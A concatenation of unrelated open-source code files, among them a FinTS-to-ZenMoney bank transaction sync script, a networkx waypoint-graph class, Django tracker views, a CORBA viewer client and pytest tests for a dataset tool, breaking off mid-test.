'string'}, }}, 'accounts': {'required': True, 'type': 'list', 'schema': { 'type': 'list', 'minlength': 2, 'maxlength': 2, 'schema': { 'type': 'string', 'regex': '^[-a-zA-Z0-9]+$', } }, 'minlength': 1} }) def get_config(filename: str) -> dict: """ Function to get or fill the config with the user interactive values Keyword argument: filename -- string with filename to read or write """ try: with open(filename) as c: config = safe_load(c) except FileNotFoundError: return write_config(filename) except ScannerError: stderr.write("Fail to read yaml config fom file {}".format(filename)) raise is_valid = v.validate(config) if not is_valid: stderr.write("Fail to validate the config: {}".format(v.errors)) exit(1) return config def write_config(filename: str) -> dict: ''' Fill the config with user input ''' config = {'bank': {}, 'zenmoney': {}, 'accounts': []} # type: dict print('Filling up the config from the input.\n' 'Please, enter your bank credentials') config['bank']['blz'] = int(input(' Please, enter blz (int): ')) config['bank']['username'] = str(input(' Please, enter username: ')) config['bank']['pin'] = str(input(' Please, enter pin: ')) config['bank']['url'] = str(input(' Please, enter url: ')) print('Checking finTS credentials') bank = FinTs( config['bank']['blz'], config['bank']['username'], config['bank']['pin'], config['bank']['url'], ) ibans = [a.iban for a in bank.accounts] print('Do you have a zenmoney oauth2 token?') if bool(int(input('1=Yes, 0=No [_1_/0]: ') or 1)): config['zenmoney']['token'] = str(input(' Please, enter token: ')) else: print('You should register your application for zenmoney API,' 'visit the page http://api.zenmoney.ru/consumer.html\n\n' 'Please, enter necessary information to generate user token') key = str(input(' Please, enter consumer_key: ')) secret = str(input(' Please, enter consumer_secret: ')) username = str(input(' Please, enter zenmoney username: ')) password = str(input(' Please, enter zenmoney password: ')) oauth = OAuth2(key, secret, username, password) config['zenmoney']['token'] = oauth.token print('Checking ZenMoney credentials') zen = Zen(config['zenmoney']['token'], 1) a_titles = [a.title for a in zen.diff.account] a_ids = [a.id for a in zen.diff.account] print('Next IBANs are available:\n {}'.format( '\n '.join(ibans) )) print('Next ZenMoney accounts are available:\n{}'.format( '\n'.join( [' {}: {}'.format(a[0], a[1]) for a in zip(a_titles, a_ids)] ) )) config['zenmoney']['withdraw_account'] = str(input( 'Enter the zenmoney account UUID for default withdraw transactions: ' )) print('Enter space separated pairs of "IBAN" "zenmoney_UUID" to sync') while True: pair = [str(x) for x in input('empty line to stop: ').split(maxsplit=1)] if not pair: break if pair[0] not in ibans: print('{} not belongs to {}\nTry again'.format( pair[0], ibans )) continue if pair[1] not in a_ids: print('{} not belongs to {}\nTry again'.format( pair[1], a_ids )) continue config['accounts'].append(pair) is_valid = v.validate(config) if not is_valid: stderr.write("Fail to validate the config: {}".format(v.errors)) exit(1) with open(filename, 'w') as c: c.write(dump(config)) print("Configuration is successfully written to {}".format(c.name)) return config def parse_args() -> Namespace: default_config = os.path.join( os.environ.get('APPDATA') or os.environ.get('XDG_CONFIG_HOME') or os.path.join(os.path.expandvars("$HOME"), '.config'), 'fints2zen.yaml' ) parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter) parser.add_argument( '-c', '--config', default=default_config, type=str, help='application config, will be filled if file does not exist' ) parser.add_argument( '-m', '--mode', default='bulk', choices=['bulk', 'serial', 'dry-run'], help='"bulk" - send all transactions without approval,' ' "serial" - approve each transaction,' ' "dry-run" - only prints transactions to sync' ) return parser.parse_args() def bulk_send(zen: Zen, transactions: list) -> None: diff = Diff( serverTimestamp=timestamp(), transaction=transactions ) zen.api.diff(diff) def serial_send(zen: Zen, transactions: list) -> None: for tr in transactions: if bool(int(input('1=Yes, 0=No [_1_/0]: ') or 1)): diff = Diff( serverTimestamp=timestamp(), transaction=[tr] ) zen.api.diff(diff) def main(): args = parse_args() config = get_config(args.config) zen = Zen(config['zenmoney']['token'], 1) bank = FinTs(config['bank']['blz'], config['bank']['username'], config['bank']['pin'], config['bank']['url']) for pair in range(len(config['accounts'])): z_transactions = zen.get_transactions(config['accounts'][pair][1]) b_transactions = bank.get_transactions( config['accounts'][pair][0], config['accounts'][pair][1], config['zenmoney']['withdraw_account'] ) (only_zen, both, only_bank) = z_transactions.compare_to(b_transactions) print('Pair "{} to {}".\n' 'Amount of transactions only in bank: {}\n' 'Amount of transactions only in zenmoney: {}\n' 'Already synced: {}'.format( config['accounts'][pair][0], config['accounts'][pair][1], len(only_bank), len(only_zen), len(both) )) if not only_bank: continue bank_to_zen = [ Transaction(user=zen.diff.user[0].id, **i[1]) for i in only_bank ] try: suggest = zen.api.suggest(ZenObjectsList(bank_to_zen)) except ZenMoneyException as e: print(e.response.__dict__) raise print('Transactions to sync: ') pprint(suggest) if args.mode == 'bulk': bulk_send(zen, suggest) if args.mode == 'serial': serial_send(zen, suggest) if __name__ == '__main__': main() ThymeBoost/exogenous_models/decision_tree_exogenous.py # -*- coding: utf-8 -*- import numpy as np import pandas as pd from sklearn.tree import DecisionTreeRegressor from ThymeBoost.exogenous_models.exogenous_base_class import ExogenousBaseModel class DecisionTree(ExogenousBaseModel): model = 'decision_tree' def __init__(self): self.model_obj = None self.fitted = None def fit(self, y, X, **kwargs): tree_depth = kwargs['tree_depth'] exo_model = DecisionTreeRegressor(max_depth=tree_depth) self.model_obj = exo_model.fit(X, y) self.fitted = self.model_obj.predict(X) #exo_impact = (exo_model.params, fitted_model.cov_params()) return self.fitted def predict(self, future_exogenous): if isinstance(future_exogenous, pd.DataFrame): future_exogenous = future_exogenous.to_numpy() return self.model_obj.predict(future_exogenous) src/visualization.py import matplotlib.pyplot as plt import numpy as np def display_predictions(training_images, preds, training_truths=[], submission_outputs=[], samples=5): training_images = np.array(training_images) preds = np.array(preds) training_truths = np.array(training_truths) submission_outputs = np.array(submission_outputs) indices = np.random.choice(len(training_images), samples, replace=False) dim = preds[0].shape[0] columns = 3 if len(training_truths) == 0 and len(submission_outputs) == 0: columns = 2 for i in range(samples): ax1 = plt.subplot2grid((samples, columns), (i, 0)) ax1.imshow(training_images[indices][i]) ax1.axis('off') ax1.set_title('Original Image') ax2 = plt.subplot2grid((samples, columns), (i, 1)) ax2.imshow(preds[indices][i].reshape(dim, dim), cmap= 'Greys_r') ax2.axis('off') ax2.set_title('Predicted Mask') if len(training_truths) != 0: ax3 = plt.subplot2grid((samples, columns), (i, 2)) ax3.imshow(training_truths[indices][i].reshape(dim, dim), cmap= 'Greys_r') ax3.axis('off') ax3.set_title('Original Mask') if len(submission_outputs) != 0: ax3 = plt.subplot2grid((samples, columns), (i, 2)) ax3.imshow(submission_outputs[indices][i].reshape(dim, dim), cmap= 'Greys_r') ax3.axis('off') ax3.set_title('Submission Output') # Author: # Datetime:2021/7/7 # Copyright belongs to the author. # Please indicate the source for reprinting. import traceback from qpt.kernel.qos import Logging SUPPORT_AVX = None try: from paddle.fluid.core_avx import * SUPPORT_AVX = True except Exception as e: Logging.warning(str(e)) info = traceback.format_exc() if "cv2" in info: # ToDo 实际上还是不能确定,但Paddle这块不知道为什么要这样测cv2是否存在 SUPPORT_AVX = True else: SUPPORT_AVX = False 1-10 import networkx as nx import pickle class MapInfo: # skirmish simulation map with 4-way connected waypoints and FOV-based visibility constraints def __init__(self): self.g_acs = nx.DiGraph(method="get_action") # {node type: idx}, {node label: encoding} self.g_vis = nx.MultiDiGraph(method="get_distance") # {node type: idx}, {edge label: distance & directions} self.n_name = dict() # lookup table for nodes {name: idx} self.n_info = dict() # {idx: (x,z)} node X and Z absolute coordinates for 2D graph drawing self.counter = 0 def add_node_acs(self, node_name) -> bool: # add node to action graph and update node dict if node_name in self.n_name: return True self.counter += 1 idx = self.counter self.n_name[node_name] = idx self.g_acs.add_node(idx, code=node_name) return False def add_node_vis_by_name(self, node_name, attrs=None) -> bool: # add node to visual graph if node is in dict if node_name in self.n_name: self.g_vis.add_node(self.n_name[node_name]) # add node init attrs # self.g_vis.add_node(self.n_name[node_name], attrs) return False return True def add_node_vis_by_index(self, idx, **args) -> bool: # add node to visual graph if node is in dict if idx in range(1, len(self.n_name) + 1): self.g_vis.add_node(idx, **args) return False def add_edge_acs(self, u_name, v_name, attr) -> bool: # check node existence first, avoid to add new nodes here if u_name in self.n_name and v_name in self.n_name: self.g_acs.add_edge(self.n_name[u_name], self.n_name[v_name], action=attr) return False return True def add_edge_vis_fov(self, u_name, v_name, attr_dist, attr_type) -> bool: # check node first: avoid to add new node that is not in the lookup dict if u_name in self.n_name and v_name in self.n_name: u_node, v_node = self.n_name[u_name], self.n_name[v_name] # set the distance attribute to the first edge if there are parallel edges if self.g_vis.has_edge(u_node, v_node): self.g_vis.add_edge(u_node, v_node, type=attr_type) else: self.g_vis.add_edge(u_node, v_node, type=attr_type) self.g_vis[u_node][v_node][0]['dist'] = attr_dist return False return True def reset(self): # if not (nx.is_frozen(self.g_acs) and nx.is_frozen(self.g_vis)): # self.g_acs.clear() # self.g_vis.clear() self.g_acs = nx.DiGraph(method="get_action") self.g_vis = nx.MultiDiGraph(method="get_distance") self.n_name = dict() self.n_info = dict() self.counter = 0 def set_draw_attrs(self, node_name, x, z): # store 'pos' absolute coordinates attribute for drawing if node_name in self.n_name: idx = self.n_name[node_name] self.n_info[idx] = (x, z) return False def get_graph_size(self): return self.counter def get_graph_size_verbose(self): return self.counter, len(self.n_name), len(self.n_info), len(self.g_acs), len(self.g_vis) def get_index_by_name(self, node_name): return self.n_name[node_name] def get_name_by_index(self, index): return self.g_acs.nodes[index]["code"] def get_edge_attr_acs_by_idx(self, u_idx, v_idx): # no edge check for faster access return self.g_acs[u_idx][v_idx]["action"] def get_edge_attr_acs_by_name(self, u_name, v_name): # no edge check for faster access return self.g_acs[self.n_name[u_name]][self.n_name[v_name]]["action"] def get_edge_attr_vis_by_idx(self, u_idx, v_idx): # no edge check for faster access return self.g_vis[u_idx][v_idx][0]["dist"] def get_edge_attr_vis_fov_by_idx(self, u_idx, v_idx, u_dir): # check all parallel edges(u, v), return the distance value (>0) if the looking direction is valid dirs = [self.g_vis[u_idx][v_idx][idx]['type'] for idx in self.g_vis[u_idx][v_idx]] # return the distance value or a -1 indicator return self.g_vis[u_idx][v_idx][0]["dist"] if (u_dir in dirs) else -1 def get_actions_by_node(self, node_name): s_idx = self.get_index_by_name(node_name) ts_idx = list(nx.neighbors(self.g_acs, s_idx)) # send valid actions in ACTION_LOOKUP return [self.get_edge_attr_acs_by_idx(s_idx, t_idx) for t_idx in ts_idx] def get_all_states_by_node(self, node_name): s_idx = self.get_index_by_name(node_name) ts_idx = list(nx.neighbors(self.g_acs, s_idx)) # send the whole 1st order subgraph (current_index, list_of_neighbor_index, list_of_action_nums) return s_idx, ts_idx, [self.get_edge_attr_acs_by_idx(s_idx, t_idx) for t_idx in ts_idx] def draw_graphs(self): img_acs = nx.draw_networkx(self.g_acs, pos=self.n_info, arrows=True) img_vis = nx.draw_networkx(self.g_vis, pos=self.n_info, arrows=True, with_labels=True) return img_acs, img_vis def get_draw_info_graph_acs(self): # get node positions and labels for connectivity graph visualization g_pos = self.n_info g_node_labels = nx.get_node_attributes(self.g_acs, "code") return g_pos, g_node_labels def get_draw_info_graph_vis(self): # get node positions and labels for visibility graph visualization # connectivity graph and visibility graph have the same node orders g_edge_labels = nx.get_edge_attributes(self.g_vis, "dist") return g_edge_labels def save_plots_to_file(self, f_acs, f_vis) -> bool: import matplotlib.pyplot as plt from datetime import datetime ts = datetime.now() timestamp = "_{}-{}-{}-{}".format(ts.month, ts.day, ts.hour, ts.minute) # save the plot of connectivity graph plt.figure() plt.axis('off') nx.draw_networkx(self.g_acs, self.n_info, arrows=True) # directed edges overlap so just one directional edge label can be seen in image # g_edge_labels = nx.get_edge_attributes(self.g_acs, "action") # nx.draw_networkx_edge_labels(self.g_acs, self.n_info, edge_labels=g_edge_labels) plt.savefig("{}{}.png".format(f_acs, timestamp)) # save the plot of visibility graph plt.figure() plt.axis('off') nx.draw_networkx(self.g_vis, pos=self.n_info, with_labels=True) # edge labels are too dense which make it hard to get a clear view if plots all # g_edge_labels = nx.get_edge_attributes(self.g_vis, "dist") # nx.draw_networkx_edge_labels(self.g_vis, pos=self.n_info, edge_labels=g_edge_labels) plt.savefig("{}{}.png".format(f_vis, timestamp)) def save_graph_files(self, f_acs, f_vis, f_name, f_info) -> bool: # [!!!] IOs change node name type from Int (i.e. 11) ot Str (i.e. '11') # cause problems in drawing nx.write_gexf(self.g_acs, f_acs) nx.write_gexf(self.g_vis, f_vis) with open(f_name, 'wb+') as file: pickle.dump(self.n_name, file, pickle.HIGHEST_PROTOCOL) with open(f_info, 'wb+') as file: pickle.dump(self.n_info, file, pickle.HIGHEST_PROTOCOL) def load_graph_files(self, f_acs, f_vis, f_name, f_info) -> bool: self.g_acs = nx.read_gexf(f_acs) self.g_vis = nx.read_gexf(f_vis) with open(f_name, 'rb') as file: self.n_name = pickle.load(file) with open(f_info, 'rb') as file: self.n_info = pickle.load(file) # check length if len(self.n_name) == len(self.n_info) and len(self.n_name) == len(self.g_acs): self.counter = len(self.n_name) # nx.freeze(self.g_acs) # nx.freeze(self.g_vis) return False else: print("[GymEnv][IO] Fatal error while loading graph xml files..") return True def save_graph_pickle(self, f_acs, f_vis, f_name, f_info): # all data saved in the pickle fashion nx.write_gpickle(self.g_acs, f_acs) nx.write_gpickle(self.g_vis, f_vis) with open(f_name, 'wb+') as file: pickle.dump(self.n_name, file, pickle.HIGHEST_PROTOCOL) with open(f_info, 'wb+') as file: pickle.dump(self.n_info, file, pickle.HIGHEST_PROTOCOL) def load_graph_pickle(self, f_acs, f_vis, f_name, f_info) -> bool: self.g_acs = nx.read_gpickle(f_acs) self.g_vis = nx.read_gpickle(f_vis) with open(f_name, 'rb') as file: self.n_name = pickle.load(file) with open(f_info, 'rb') as file: self.n_info = pickle.load(file) # check length if len(self.n_name) == len(self.n_info) and len(self.n_name) == len(self.g_acs): self.counter = len(self.n_name) return False else: print("[GymEnv][IO] Fatal error while loading graph pickle files..") return True class ActGraph(nx.DiGraph): def __init__(self): super(nx.DiGraph, self).__init__() self.node_list = list() self.edge_relational = list() self.route_counter = 0 self.route_list = list() # type=RouteInfo() for multiple patrol routes class VisGraph(nx.Graph): def __init__(self): super(nx.MultiDiGraphGraph, self).__init__() self.edge_list = list() self.weights = list() self.positions = list() class RouteInfo: def __init__(self): # load from files self.list_code = list() # encodings of the nodes # generate in runtime self.list_node = list() # nodes in the patrol route self.list_move = list() # moving direction in the current step self.list_next = list() # moving direction in the next step for fast retrieval def save_route_pickle(self, f_route): with open(f_route, 'wb+') as file: pickle.dump(self.list_code, file, pickle.HIGHEST_PROTOCOL) def load_route_pickle(self, f_route): with open(f_route, 'rb') as file: self.list_code = pickle.load(file) def save_route(self, f_route): with open(f_route + '.pkl', 'wb+') as file: pickle.dump(self.list_code, file, pickle.HIGHEST_PROTOCOL) def load_route(self, f_route): with open(f_route + '.pkl', 'rb') as file: self.list_code = pickle.load(file) def add_node_to_route(self, node): self.list_code.append(node) def reset(self): pass def generate_path_graph(self): # self.g_pat = nx.path_graph(self.node_list) # self.g_pat.add_edge(self.get_node_by_index(-1), self.get_node_by_index(0)) # close loop pass def get_node_by_index(self, index: int) -> str: return self.list_code[index] def get_next_move_by_index(self, index: int): return self.list_next[index] def get_location_by_index(self, index: int): return self.list_node[index], self.list_code[index], self.list_move[index] def get_index_by_code(self, code: str) -> int: return self.list_code.index(code) def get_route_length(self) -> int: return len(self.list_code) 1-10 # Copyright 2020, Battelle Energy Alliance, LLC # ALL RIGHTS RESERVED """ Example class for validators. """ import numpy as np from utils import InputData, InputTypes from .Validator import Validator class Example(Validator): """ Example class for validating dispatch decisions. Arbitrarily, uses percent based ramping limits """ # --------------------------------------------- # INITIALIZATION @classmethod def get_input_specs(cls): """ Set acceptable input specifications. @ In, None @ Out, specs, InputData, specs """ specs = Validator.get_input_specs() specs.name = 'Example' specs.description = r"""Uses a demonstration-only validator that constrains the change for any resource to a constant ``delta''.""" specs.addSub(InputData.parameterInputFactory('delta', contentType=InputTypes.FloatType, descr=r"""the maximum absolute change in any resource between successive time steps.""")) specs.addSub(InputData.parameterInputFactory('tolerance', contentType=InputTypes.FloatType, descr=r"""the strictness with which the constraint should be enforced. Note that some small numerical exception is expected.""")) return specs def __init__(self): """ Constructor. @ In, None @ Out, None """ self.name = 'BaseValidator' self._allowable = 0.5 self._tolerance = 1e-14 def read_input(self, inputs): """ Loads settings based on provided inputs @ In, inputs, InputData.InputSpecs, input specifications @ Out, None """ delta = inputs.findFirst('delta') if delta: self._allowable = delta.value tol = inputs.findFirst('tolerance') if tol: self._tolerance = tol.value # --------------------------------------------- # API def validate(self, components, dispatch, times, meta): """ Method to validate a dispatch activity. @ In, components, list, HERON components whose cashflows should be evaluated @ In, activity, DispatchState instance, activity by component/resources/time @ In, times, np.array(float), time values to evaluate; may be length 1 or longer @ In, meta, dict, extra information pertaining to validation @ Out, errs, list, information about validation failures """ errs = [] # TODO best format for this? for comp, info in dispatch._resources.items(): for tracker in comp.get_tracking_vars(): for res in info: for t, time in enumerate(times): current = dispatch.get_activity(comp, tracker, res, time) if comp.get_interaction().is_type('Storage') and t == 0: init_level = comp.get_interaction().get_initial_level(meta) if t > 0: previous = dispatch.get_activity(comp, tracker, res, times[t-1]) delta = current - previous sign = np.sign(delta) if abs(delta) - self._allowable > self._tolerance: errs.append({'msg': f'Exceeded ramp of {self._allowable} with {delta:1.8e}', 'limit': previous + (sign * self._allowable), 'limit_type': 'lower' if (sign < 0) else 'upper', 'component': comp, 'resource': res, 'time': time, 'time_index': t, }) return errs import sys,pickle def usage(): print(""" pretty print the possible call trees over a given routine name from the routines listed in .mkdep_routines usage: calltree ROUTINE """) sys.exit(2) def print_names(names, dict, level, stack=[]): level += " " for name in names: file= "" if name in dict: file = dict[name][0] print((level+name).ljust(60) + file) if name in stack: print(level + "Recursion?") return stack.append(name) if name in dict: print_names(dict[name][1], dict, level, stack) last = stack.pop() # get the routines dictionary from the restart file f=open('.mkdep_restart_file','r') for fivetimes in [1,2,3,4,5]: routines = pickle.load(f) f.close() if len(sys.argv)<2: usage() print("In the trees of the current mkdep run (.mkdep_restart_file)") print("the possible tree over "+sys.argv[1]+" looks like the below;") level="" stack=[] print_names([sys.argv[1]], routines, level, stack) from django.shortcuts import render from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView from rest_framework.permissions import IsAuthenticated from babies.models import Babies from tracker.models import Tracker from tracker.serializers import TrackerSerializer # Create your views here. class TrackerList(ListCreateAPIView): """ List all records, or create a new record. """ serializer_class = TrackerSerializer def perform_create(self, serializer): name = self.kwargs['name'] baby = Babies.objects.get(name=name) serializer.save(baby=baby) def get_queryset(self): """ restrics returned records to a given baby by filtering against a 'name' query parameter in the URL. """ queryset = Tracker.objects.all() name = self.kwargs['name'] queryset = queryset.filter(baby__name=name) return queryset class TrackerDetail(RetrieveUpdateDestroyAPIView): """ Retrive, update or delete a record instance """ queryset = Tracker.objects.all() serializer_class = TrackerSerializer 0 from typing import Dict TranslationDict = Dict[str, Dict[str, str]] dp_tornado/helper/web/http/delete.py # -*- coding: utf-8 -*- from dp_tornado.engine.helper import Helper as dpHelper class DeleteHelper(dpHelper): def raw(self, url, **kwargs): return self.helper.web.http.request(req_type='delete', res_type='raw', url=url, **kwargs) def json(self, url, **kwargs): return self.helper.web.http.request(req_type='delete', res_type='json', url=url, **kwargs) def text(self, url, **kwargs): return self.helper.web.http.request(req_type='delete', res_type='text', url=url, **kwargs) def html(self, url, **kwargs): return self.helper.web.http.request(req_type='delete', res_type='html', url=url, **kwargs) moviesite/moviesite/urls.py from django.conf.urls import patterns, include, url from django.contrib import admin from django.conf import settings from django.conf.urls.static import static urlpatterns = patterns('', url(r'^recommender/', include('recommender.urls', namespace = "recommender")), url(r'^polls/', include('polls.urls', namespace = "polls")), url(r'^', include('mainp.urls', namespace = "mainp")), url(r'^movielists/', include('movielists.urls', namespace = "movielists")), url(r'^admin/', include(admin.site.urls)), ) urlpatterns += patterns('', url(r'^media/(?P.*)$', 'django.views.static.serve', { 'document_root': settings.MEDIA_ROOT, }), ) import pygame as pg import pygame_widgets as pw load("//rules/analysis_tests:identical_outputs_test.bzl", "identical_outputs_test") def make_tests(): identical_outputs_test( name = "test_DependencyEquivilance", target_under_test = ":AppWithSelectableCopts", # These inputs *must* be passed seperately, in order to # have different transitions applied by Skyframe. deps = [":AppWithSelectableCopts", ":SwiftLib"], ) native.test_suite( name = "AnalysisTests", tests = [ ":test_DependencyEquivilance", ], ) src/InstaFriend.py class InstaFriend(object): def __init__(self, name): self.name = name def say_something(self): print(self.name)0 """ Provide a client for CORBA services which initialize CORBA automatically and create client to wanted HPP services. """ class CorbaError(Exception): """ Raised when a CORBA error occurs. """ def __init__(self, value): self.value = value def __str__(self): return repr(self.value) class Client: """ Connect and create clients for all HPP services. """ defaultClients = [('gui', 'GraphicalInterface')] def initWithNameService (self, urlNameService): import CosNaming from .gepetto.corbaserver import GraphicalInterface obj = self.orb.string_to_object (urlNameService) self.rootContext = obj._narrow(CosNaming.NamingContext) if self.rootContext is None: raise CorbaError ('Failed to narrow the root context') name = [CosNaming.NameComponent ("gepetto", "viewer"), CosNaming.NameComponent ("corbaserver", "gui")] try: obj = self.rootContext.resolve (name) except CosNaming.NamingContext.NotFound: raise CorbaError ('Failed to find the service "gui"') try: client = obj._narrow (GraphicalInterface) except KeyError: raise CorbaError ('Invalid service name "gui"') if client is None: # This happens when stubs from client and server are not synchronized. raise CorbaError ( 'Failed to narrow client for service named "gui"') self.gui = client def initWithDirectLink (self, url): from .gepetto.corbaserver import GraphicalInterface obj = self.orb.string_to_object (url) client = obj._narrow(GraphicalInterface) if client is None: # This happens when stubs from client and server are not synchronized. raise CorbaError ( 'Failed to narrow client for service named "gui"') self.gui = client def __init__(self, clients = defaultClients, url = None, host = None, port = None): """ Initialize CORBA and create default clients. :param url: URL in the IOR, corbaloc, corbalocs, and corbanames formats. For a remote corba server, use url = "corbaloc:iiop::/NameService". If None, url is initialized with param host, or alternatively with _getIIOPurl :param host: if not None, url is set to = "corbaloc:iiop:" + str(host) + "/NameService" """ from omniORB import CORBA import sys self.orb = CORBA.ORB_init (sys.argv, CORBA.ORB_ID) if url is not None: try: self.initWithDirectLink (url) except CorbaError: pass if self.gui is None: self.initWithNameService (url) else: urlNameService = _getIIOPurl(service="NameService", host=host, port = port if port else 2809) urlGepettoGui = _getIIOPurl(service="gepetto-gui", host=host, port = port if port else 12321) try: self.initWithDirectLink (urlGepettoGui) except CorbaError as e: print(e) pass if self.gui is None: self.initWithNameService (urlNameService) # In the python interpreter of gepetto-gui, gui.createWindow # crashes for an obscure reason. This hack makes it work. try: from PythonQt.gepetto import MainWindow # At this point, we are in the python interpreter of gepetto-gui self.gui.createWindow = lambda x: MainWindow.instance().createView(x).windowID() except ImportError: # At this point, we are NOT in the python interpreter of gepetto-gui pass def _getIIOPurl (service="NameService", host=None, port=None): """ Returns "corbaloc:iiop::/NameService" where host and port are, in this order of priority: - GEPETTO_VIEWER_HOST, GEPETTO_VIEWER_PORT environment variables - /gepetto_viewer/host, /gepetto_viewer/port ROS parameters - use default values ("localhost", 2809) """ _host = "localhost" _port = 2809 import os try: import rospy # Check is ROS master is reachable. if rospy.client.get_master().target is not None: _host = rospy.get_param("/gepetto_viewer/host", _host) _port = rospy.get_param("/gepetto_viewer/port", _port) except: pass _host = os.getenv ("GEPETTO_VIEWER_HOST", _host) _port = os.getenv ("GEPETTO_VIEWER_PORT", _port) if host: _host = host if port: _port = port if _host is None and _port is None: url = "corbaloc:iiop:" else: url = "corbaloc:iiop:{}:{}".format(_host, _port) return url + "/" + service """ Test functions for processing datasets: generate, transform and explore; """ import os import re import argparse import tempfile from pathlib import Path import pytest from squids.dataset.maker import create_dataset from squids.tfrecords.maker import ( create_tfrecords, CategoriesMap, InvalidDatasetFormat, ) from squids.tfrecords.loader import load_tfrecords from squids.tfrecords.explorer import explore_tfrecords from squids.actions import generate, transform, explore from squids.tfrecords.errors import DirNotFoundError, IdentifierNotFoundError from squids.config import ( IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, BATCH_SIZE, NUM_DETECTING_OBJECTS, ) # ------------------------------------------------------------------------------ # Helper Functions # ------------------------------------------------------------------------------ def validate_csv_generator(dataset_dir): assert set(os.listdir(dataset_dir)) == set( [ "images", "instances_train.csv", "instances_test.csv", "instances_val.csv", "categories.json", ] ) assert len(os.listdir(dataset_dir / "images")) == 1000 def validate_coco_generator(dataset_dir): assert set(os.listdir(dataset_dir)) == set( [ "annotations", "instances_train", "instances_val", "instances_test", ] ) assert set(os.listdir(dataset_dir / "annotations")) == set( [ "instances_train.json", "instances_val.json", "instances_test.json", ] ) assert len(os.listdir(dataset_dir / "instances_train")) > 0 assert len(os.listdir(dataset_dir / "instances_val")) > 0 assert len(os.listdir(dataset_dir / "instances_test")) > 0 def validate_transformer(tfrecords_dir): assert set(os.listdir(tfrecords_dir)) == set( ["instances_train", "instances_test", "instances_val"] ) assert len(os.listdir(tfrecords_dir / "instances_train")) > 0 assert len(os.listdir(tfrecords_dir / "instances_val")) > 0 assert len(os.listdir(tfrecords_dir / "instances_test")) > 0 def validate_tfrecords_stdout(stdout, kind): assert re.search( f".*instances_{kind}", stdout, ) assert ( len( re.findall( "\\d+\\s\\{(1|2|3|1, 2|1, 3|2, 3|1, 2, 3)\\}", stdout, ) ) > 1 ) assert re.search( "Total\\s\\d+\\srecords", stdout, ) def validate_tfrecords_artifacts(record_ids, record_summaries): assert type(record_ids) == list assert type(record_summaries) == list assert len(record_ids) > 0 assert len(record_summaries) > 0 assert len(record_ids) == len(record_summaries) for record_id, record_summary in zip(record_ids, record_summaries): assert record_id >= 0 assert len(record_summaries) > 0 assert re.search( "\\{(1|2|3|1, 2|1, 3|2, 3|1, 2, 3)\\}", str(set(record_summary)), ) def validate_no_tfrecords(stdout): assert re.search( "No\\stfrecords\\shas\\sfound", stdout, ) def validate_tfrecord_stdout(stdout, image_id, image_output_dir): # Tests a record summary. assert re.search("Property\\s+Value", stdout) assert re.search(f"image_id\\s+{image_id}", stdout) assert re.search("image_size\\s+\\(\\d+, \\d+\\)", stdout) assert re.search("number_of_objects\\s+\\d+", stdout) assert re.search("available_categories\\s+\\{[\\d+(,\\s)?]+\\}", stdout) assert re.search( f"Image saved to {str(image_output_dir)}/{image_id}.png", stdout ) # Tests a record image. assert Path(image_output_dir / f"{image_id}.png").exists() def validate_tfrecord_artifacts(record_summary, record_image, image_id): # Tests a record summary. assert type(record_summary) == dict assert record_summary["image_id"] == image_id assert re.search("\\d+", str(record_summary["image_id"])) assert re.search("\\(\\d+, \\d+\\)", str(record_summary["image_size"])) assert re.search("\\d+", str(record_summary["number_of_objects"])) assert re.search( "\\{(\\d+(,\\s)?)+\\}", str(record_summary["available_categories"]) ) # Tests a record image. assert record_image is not None assert record_image.size == (64, 64) # ------------------------------------------------------------------------------ # GTE Function Tests # ------------------------------------------------------------------------------ def core_function_testscript(coco): """Tests generate/transform/explore functions.""" with tempfile.TemporaryDirectory() as tmp_dir: # ----------------------------- # Generates and checks dataset. # ----------------------------- dataset_dir = Path(tmp_dir + "/synthetic") dataset_dir.mkdir() # this tests code which deletes old dataset; create_dataset(dataset_dir, coco=coco, random_state=42) if coco: validate_coco_generator(dataset_dir) else: validate_csv_generator(dataset_dir) # ------------------------------------ # Transforms dataset to the TFRecords. # ------------------------------------ tfrecords_dir = Path(tmp_dir + "/synthetic-tfrecords") tfrecords_dir.mkdir() # this tests code which deletes old TFRecords; create_tfrecords(dataset_dir) validate_transformer(tfrecords_dir) # ------------------- # Explores TFRecords. # ------------------- image_id = None for kind in ["train", "val", "test"]: record_ids, record_summaries = explore_tfrecords( Path(tmp_dir + f"/synthetic-tfrecords/instances_{kind}"), return_artifacts=True, ) validate_tfrecords_artifacts(record_ids, record_summaries) # Grabs image ID for exploring individual records. if kind == "train": image_id = record_ids[0] with pytest.raises(DirNotFoundError): record_summaries = explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_xxx"), return_artifacts=True, ) # ------------------------- # Explores single TFRecord. # ------------------------- assert image_id is not None record_image, record_summary = explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_train"), image_id, tfrecords_dir, return_artifacts=True, ) validate_tfrecord_artifacts(record_summary, record_image, image_id) with pytest.raises(DirNotFoundError): explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_xxx"), image_id, tfrecords_dir, return_artifacts=True, ) with pytest.raises(DirNotFoundError): explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_train"), image_id, tfrecords_dir / "xxx", return_artifacts=True, ) with pytest.raises(IdentifierNotFoundError): explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_train"), 999999, tfrecords_dir, return_artifacts=True, ) # Tests an action for removing the "/synthetic" directory. with tempfile.TemporaryDirectory() as tmp_dir: dataset_dir = Path(tmp_dir + "/synthetic") dataset_dir.mkdir() create_dataset(dataset_dir) # Tests a reaction for missing directory with pytest.raises(DirNotFoundError): dataset_dir = Path(tmp_dir + "/synthetic") create_tfrecords(dataset_dir) # Tests a reaction for missing directory with pytest.raises(DirNotFoundError): dataset_dir = Path(tmp_dir + "/synthetic") create_dataset(dataset_dir, coco=coco) tfrecords_dir = Path(tmp_dir + "/somewhere/synthetic") create_tfrecords(dataset_dir, tfrecords_dir) def test_csv_generator_transformer_explore_functions(): """Tests the CSV data generate/transform/explore functions.""" core_function_testscript(coco=False) def test_coco_generator_transformer_explore_functions(): """Tests the CSV data generate/transform/explore functions.""" core_function_testscript(coco=True) # ------------------------------------------------------------------------------ # GTE Action Tests # ------------------------------------------------------------------------------ def core_action_testscript(capsys, coco): """Tests generate/transform/explore actions.""" parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() generate(subparsers) transform(subparsers) explore(subparsers) with tempfile.TemporaryDirectory() as 